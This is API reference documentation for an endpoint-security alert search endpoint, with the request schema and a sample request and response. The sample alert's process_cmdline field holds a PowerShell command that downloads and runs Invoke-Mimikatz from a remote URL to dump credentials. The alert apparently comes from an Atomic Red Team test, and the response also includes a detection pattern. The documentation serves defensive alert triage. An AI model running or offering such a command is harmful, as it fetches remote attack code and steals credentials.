Find alerts - Ungrouped
POST {{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search
Alert search request. Several related alert endpoints accept a similar request body schema.
RBAC Permissions Required
| Permission (.notation name) | Operation(s) |
|---|---|
| org.alerts | READ |
Request Schema
{
"query": "<string>",
"time_range": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"criteria": {
"org_key": [
"<string>"
],
"id": [
"<string>"
],
"type": [
"<string>"
],
"backend_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"user_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"backend_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"detection_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"first_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"last_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"category": [
"<string>"
],
"minimum_severity": <integer>,
"reason_code": [
"<string>"
],
"threat_id": [
"<string>"
],
"primary_event_id": [
"<string>"
],
"policy_applied": [
"<string>"
],
"run_state": [
"<string>"
],
"sensor_action": [
"<string>"
],
"workflow_status": [
"<string>"
],
"workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"workflow_changed_by_type": [
"<string>"
],
"workflow_changed_by_autoclose_rule_id": [
"<string>"
],
"workflow_closure_reason": [
"<string>"
],
"determination_value": [
"<string>"
],
"determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"determination_changed_by_type": [
"<string>"
],
"tags": [
"<string>"
],
"alert_notes_present": <boolean>,
"threat_notes_present": <boolean>,
"device_id": [
<long>
],
"device_name": [
"<string>"
],
"device_uem_id": [
"<string>"
],
"device_policy": [
"<string>"
],
"device_policy_id": [
<long>
],
"device_target_value": [
"<string>"
],
"device_os": [
"<string>"
],
"device_os_version": [
"<string>"
],
"device_username": [
"<string>"
],
"device_location": [
"<string>"
],
"device_external_ip": [
"<string>"
],
"device_internal_ip": [
"<string>"
],
"rule_config_type": [
"<string>"
],
"rule_config_name": [
"<string>"
],
"rule_config_id": [
"<string>"
],
"rule_category_id": [
"<string>"
],
"rule_id": [
"<string>"
],
"process_guid": [
"<string>"
],
"process_pid": [
<integer>
],
"process_name": [
"<string>"
],
"process_sha256": [
"<string>"
],
"process_md5": [
"<string>"
],
"process_effective_reputation": [
"<string>"
],
"process_reputation": [
"<string>"
],
"process_cmdline": [
"<string>"
],
"process_username": [
"<string>"
],
"process_signatures_certificate_authority": [
"<string>"
],
"process_signatures_publisher": [
"<string>"
],
"parent_guid": [
"<string>"
],
"parent_pid": [
<integer>
],
"parent_name": [
"<string>"
],
"parent_sha256": [
"<string>"
],
"parent_md5": [
"<string>"
],
"parent_effective_reputation": [
"<string>"
],
"parent_reputation": [
"ADWARE",
"NOT_SUPPORTED"
],
"parent_cmdline": [
"<string>"
],
"parent_username": [
"<string>"
],
"childproc_guid": [
"<string>"
],
"childproc_name": [
"<string>"
],
"childproc_sha256": [
"<string>"
],
"childproc_md5": [
"<string>"
],
"childproc_effective_reputation": [
"<string>"
],
"childproc_username": [
"<string>"
],
"childproc_cmdline": [
"<string>"
],
"netconn_remote_port": [
<integer>
],
"netconn_local_port": [
<integer>
],
"netconn_protocol": [
"<string>"
],
"netconn_remote_domain": [
"<string>"
],
"netconn_remote_ip": [
"<string>"
],
"netconn_local_ip": [
"<string>"
],
"netconn_remote_ipv4": [
"<string>"
],
"netconn_local_ipv4": [
"<string>"
],
"netconn_remote_ipv6": [
"<string>"
],
"netconn_local_ipv6": [
"<string>"
],
"threat_category": [
"<string>"
],
"ttps": [
"<string>"
],
"attack_tactic": [
"<string>"
],
"attack_technique": [
"<string>"
],
"report_id": [
"<string>"
],
"report_name": [
"<string>"
],
"report_link": [
"<string>"
],
"watchlists_id": [
"<string>"
],
"watchlists_name": [
"<string>"
],
"k8s_policy_id": [
"<string>"
],
"k8s_policy": [
"<string>"
],
"k8s_rule_id": [
"<string>"
],
"k8s_rule": [
"<string>"
],
"cluster_name": [
"<string>"
],
"namespace": [
"<string>"
],
"workload_kind": [
"<string>"
],
"workload_name": [
"<string>"
],
"replica_id": [
"<string>"
],
"connection_type": [
"<string>"
],
"egress_group_id": [
"<string>"
],
"egress_group_name": [
"<string>"
],
"ip_reputation": [
<integer>
],
"remote_is_private": <boolean>,
"remote_namespace": [
"<string>"
],
"remote_replica_id": [
"<string>"
],
"remote_workload_kind": [
"<string>"
],
"remote_workload_name": [
"<string>"
],
"tms_rule_id": [
"<string>"
],
"threat_name": [
"<string>"
],
"vendor_name": [
"<string>"
],
"vendor_id": [
"<string>"
],
"product_name": [
"<string>"
],
"product_id": [
"<string>"
],
"external_device_friendly_name": [
"<string>"
],
"serial_number": [
"<string>"
],
"blocked_name": [
"<string>"
],
"blocked_sha256": [
"<string>"
],
"blocked_md5": [
"<string>"
],
"blocked_effective_reputation": [
"<string>"
],
"ml_classification_final_verdict": [
"<string>"
],
"ml_classification_global_prevalence": [
"<string>"
],
"ml_classification_org_prevalence": [
"<string>"
],
"mdr_alert": <boolean>,
"mdr_workflow_status": [
"<string>"
],
"mdr_workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"mdr_workflow_is_assigned": <boolean>,
"mdr_determination_value": [
"<string>"
],
"mdr_determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
}
},
"exclusions": {
"org_key": [
"<string>"
],
"id": [
"<string>"
],
"type": [
"<string>"
],
"backend_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"user_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"backend_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"detection_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"first_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"last_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"category": [
"<string>"
],
"minimum_severity": <integer>,
"reason_code": [
"<string>"
],
"threat_id": [
"<string>"
],
"primary_event_id": [
"<string>"
],
"policy_applied": [
"<string>"
],
"run_state": [
"<string>"
],
"sensor_action": [
"<string>"
],
"workflow_status": [
"<string>"
],
"workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"workflow_changed_by_type": [
"<string>"
],
"workflow_changed_by_autoclose_rule_id": [
"<string>"
],
"workflow_closure_reason": [
"<string>"
],
"determination_value": [
"NONE"
],
"determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"determination_changed_by_type": [
"<string>"
],
"tags": [
"<string>"
],
"alert_notes_present": <boolean>,
"threat_notes_present": <boolean>,
"device_id": [
<long>
],
"device_name": [
"<string>"
],
"device_uem_id": [
"<string>"
],
"device_policy": [
"<string>"
],
"device_policy_id": [
<long>
],
"device_target_value": [
"<string>"
],
"device_os": [
"<string>"
],
"device_os_version": [
"<string>"
],
"device_username": [
"<string>"
],
"device_location": [
"<string>"
],
"device_external_ip": [
"<string>"
],
"device_internal_ip": [
"<string>"
],
"rule_config_type": [
"<string>"
],
"rule_config_name": [
"<string>"
],
"rule_config_id": [
"<string>"
],
"rule_category_id": [
"<string>"
],
"rule_id": [
"<string>"
],
"process_guid": [
"<string>"
],
"process_pid": [
<integer>
],
"process_name": [
"<string>"
],
"process_sha256": [
"<string>"
],
"process_md5": [
"<string>"
],
"process_effective_reputation": [
"<string>"
],
"process_reputation": [
"<string>"
],
"process_cmdline": [
"<string>"
],
"process_username": [
"<string>"
],
"process_signatures_certificate_authority": [
"<string>"
],
"process_signatures_publisher": [
"<string>"
],
"parent_guid": [
"<string>"
],
"parent_pid": [
<integer>
],
"parent_name": [
"<string>"
],
"parent_sha256": [
"<string>"
],
"parent_md5": [
"<string>"
],
"parent_effective_reputation": [
"<string>"
],
"parent_reputation": [
"<string>"
],
"parent_cmdline": [
"<string>"
],
"parent_username": [
"<string>"
],
"childproc_guid": [
"<string>"
],
"childproc_name": [
"<string>"
],
"childproc_sha256": [
"<string>"
],
"childproc_md5": [
"<string>"
],
"childproc_effective_reputation": [
"<string>"
],
"childproc_username": [
"<string>"
],
"childproc_cmdline": [
"<string>"
],
"netconn_remote_port": [
<integer>
],
"netconn_local_port": [
<integer>
],
"netconn_protocol": [
"<string>"
],
"netconn_remote_domain": [
"<string>"
],
"netconn_remote_ip": [
"<string>"
],
"netconn_local_ip": [
"<string>"
],
"netconn_remote_ipv4": [
"<string>"
],
"netconn_local_ipv4": [
"<string>"
],
"netconn_remote_ipv6": [
"<string>"
],
"netconn_local_ipv6": [
"<string>"
],
"threat_category": [
"<string>"
],
"ttps": [
"<string>"
],
"attack_tactic": [
"<string>"
],
"attack_technique": [
"<string>"
],
"report_id": [
"<string>"
],
"report_name": [
"<string>"
],
"report_link": [
"<string>"
],
"watchlists_id": [
"<string>"
],
"watchlists_name": [
"<string>"
],
"k8s_policy_id": [
"<string>"
],
"k8s_policy": [
"<string>"
],
"k8s_rule_id": [
"<string>"
],
"k8s_rule": [
"<string>"
],
"cluster_name": [
"<string>"
],
"namespace": [
"<string>"
],
"workload_kind": [
"<string>"
],
"workload_name": [
"<string>"
],
"replica_id": [
"<string>"
],
"connection_type": [
"<string>"
],
"egress_group_id": [
"<string>"
],
"egress_group_name": [
"<string>"
],
"ip_reputation": [
<integer>
],
"remote_is_private": <boolean>,
"remote_namespace": [
"<string>"
],
"remote_replica_id": [
"<string>"
],
"remote_workload_kind": [
"<string>"
],
"remote_workload_name": [
"<string>"
],
"tms_rule_id": [
"<string>"
],
"threat_name": [
"<string>"
],
"vendor_name": [
"<string>"
],
"vendor_id": [
"<string>"
],
"product_name": [
"<string>"
],
"product_id": [
"<string>"
],
"external_device_friendly_name": [
"<string>"
],
"serial_number": [
"<string>"
],
"blocked_name": [
"<string>"
],
"blocked_sha256": [
"<string>"
],
"blocked_md5": [
"<string>"
],
"blocked_effective_reputation": [
"<string>"
],
"ml_classification_final_verdict": [
"<string>"
],
"ml_classification_global_prevalence": [
"<string>"
],
"ml_classification_org_prevalence": [
"<string>"
],
"mdr_alert": <boolean>,
"mdr_workflow_status": [
"<string>"
],
"mdr_workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"mdr_workflow_is_assigned": <boolean>,
"mdr_determination_value": [
"<string>"
],
"mdr_determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
}
},
"start": <long>,
"rows": <long>,
"sort": [
{
"field": "<string>",
"order": "DESC"
},
{
"field": "<string>",
"order": "DESC"
}
]
}
Request Body
{"time_range":{"range":"-2w"},"criteria":{"minimum_severity":2,"device_os":["WINDOWS"]},"exclusions":{"device_os_version":["Windows 10 x64"],"threat_id":["7103E507844087BE20351A50D8773029"]},"start":"1","rows":"10","sort":[{"field":"severity","order":"DESC"}]}
HEADERS
| Key | Datatype | Required | Description |
|---|---|---|---|
| Content-Type | string | | |
| Accept | string | | |
RESPONSES
status: OK
{"results":[{"org_key":"ABCD1234","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c3fa0b1-36fe-4641-9f87-95128bef94eb\u0026orgKey=ABCD1234","id":"1c3fa0b1-36fe-4641-9f87-95128bef94eb","type":"WATCHLIST","backend_timestamp":"2023-08-06T13:33:47.411Z","user_update_timestamp":null,"backend_update_timestamp":"2023-08-06T13:33:47.411Z","detection_timestamp":"2023-08-06T13:32:59.205Z","first_event_timestamp":"2023-08-06T13:30:17.713Z","last_event_timestamp":"2023-08-06T13:30:17.713Z","severity":10,"reason":"Process powershell.exe was detected by the report \"Execution - AMSI - .Net Loading Suspicious Content Into Memory\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"0f6918d8-98c5-3ed9-9786-b8c6094eeb78:8c25935c-f78b-3ed3-b29e-4ce9c2a42ba0","threat_id":"0F6918D898C58ED9D786B8C6094EEB78","primary_event_id":"DHeFhEvUQCerOi2CvDbWUA-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-08-06T13:33:47.411Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2023-08-06T13:33:47.411Z","value":"NONE","changed_by_type":null,"changed_by":null},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":1212123,"device_name":"demo_machine","device_uem_id":"","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows Server 2019 x64","device_username":"demo@demoorg.com","device_location":"UNKNOWN","device_external_ip":"1.2.3.4","device_internal_ip":"5.6.7.8","mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-5f8518fb-3981-44ce-8ab7-b4a4240d50e0","report_name":"Execution - AMSI - .Net Loading Suspicious Content Into Memory","report_description":"An attacker can leverage PowerShell's built-in abilities to access the .Net subsystem 
in Windows to load arbitrary code into memory. This is a common technique that is used to evade on-host AV scanning by never writing a file to disk and executing payloads directly in memory. You should take immediate action if responding to this alert.","report_tags":["evasion","t1106","t1059","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1106/","ioc_id":"5f8518fb-3981-44ce-8ab7-b4a4240d50e0","ioc_hit":"fileless_scriptload_cmdline:\"[System.Runtime.InteropServices.Marshal]::Copy\" OR scriptload_content:\"[System.Runtime.InteropServices.Marshal]::Copy\"","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"ABCD1234-006a07ff-00000540-00000000-1d9c86a2286f3bc","process_pid":1344,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","process_md5":"7353f60b1739074eb17c5f4dddefe239","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"\"powershell.exe\" \u0026 {IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds}","process_username":"KOGNOS-W19-CB-3\\Administrator","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"ABCD1234-006a07ff-00000dbc-00000000-1d9c86a210c4ece","parent_pid":3516,"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"\"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\" -c \"cd c:\\ ; echo 
MYPID=$PID; Get-Date ; Invoke-AtomicTest T1003.001-10 \"","parent_username":"KOGNOS-W19-CB-3\\Administrator","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"NOT_ANOMALOUS","ml_classification_global_prevalence":"MEDIUM","ml_classification_org_prevalence":"LOW"}],"num_found":10995,"num_available":10000}